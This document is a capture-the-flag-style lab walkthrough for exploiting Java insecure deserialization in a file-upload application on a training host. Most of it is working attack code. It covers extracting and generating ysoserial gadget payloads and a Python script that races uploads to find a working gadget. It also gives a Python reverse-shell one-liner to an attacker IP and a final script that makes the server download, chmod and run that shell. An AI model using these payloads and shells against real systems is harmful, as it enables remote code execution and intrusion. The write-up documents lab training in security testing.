Java Insecure Deserialization I

Port scan and dirbuster of the web server.

/upload php allows us to upload a file.

In this application you have to read the file while the upload is being processed. This means you need two tabs open. After you click upload you need to then click read in a separate browser tab.

This lab required to brute force the gagets. First step is to extract them from ysoserial.

java -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar >yso  2>&1
cat yso | tr -d ' ' | cut -d "@" -f 1 > payloads.txt
sed -i -e '1,7d'  payloads.txt

Then generate the payloads.

while read payloadname; do java -jar ../root/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar $payloadname "ping 192.19.68.2 -c 3" > $payloadname; done < payloads.txt

The below python script will try to send each payload to the application and then read the file.

import requests
import time
import threading
def readfile(filename):
    url = "http://demo.ine.local/upload/index.php?sent=OK"
    r = requests.get(url)
    print("[+] Used filename: " + filename)
    print(r.text)
    print("\n")
def upload(filename):
    url = "http://demo.ine.local/upload/upload.php"
    files ={'uploaded_file': open(filename, 'rb')}
    r = requests.post(url, files=files)
payloads = ['AspectJWeaver', 'BeanShell1', 'C3P0', 'Click1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'FileUpload1', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JRMPListener', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'Jython1', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'URLDNS', 'Vaadin1', 'Wicket1']
for payload in payloads:
    x=threading.Thread(target=upload, args=(payload,))
    x.start()
    readfile(payload)
    time.sleep(2)

Run tcpdump to check for the pingback.

tcpdump -i eth1 icmp

The ping is received and we can confirm that the correct payload is CommonsCollections2.

Create a file named rev.py and start a Python web server.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.19.68.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Setup a netcat listener and observe the reverse shell.

Final python script is below. Note that it has to run the payload 3 times, once to download the rev.py, then chmod +x and then execute.

import requests
import time
import threading
import os
def readfile(filename):
    url = "http://demo.ine.local/upload/index.php?sent=OK"
    r = requests.get(url)
    print("[+] Used filename: " + filename)
    print(r.text)
    print("\n")
def upload(filename):
    url = "http://demo.ine.local/upload/upload.php"
    files ={'uploaded_file': open(filename, 'rb')}
    r = requests.post(url, files=files)
payload = 'CommonsCollections2'
commands = [
'"curl http://192.19.68.2:8443/rev.py -O rev.py"',
'"chmod +x rev.py"',
'"./rev.py"'
]
for command in commands:
    os.system("java -jar /root/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar " + payload + " " + command + " > " + payload)
    x=threading.Thread(target=upload, args=(payload,))
    x.start()
    readfile(payload)
    time.sleep(2)

PreviousJava Insecure Deserialization II Next.NET Insecure Deserialization

Last updated 4 months ago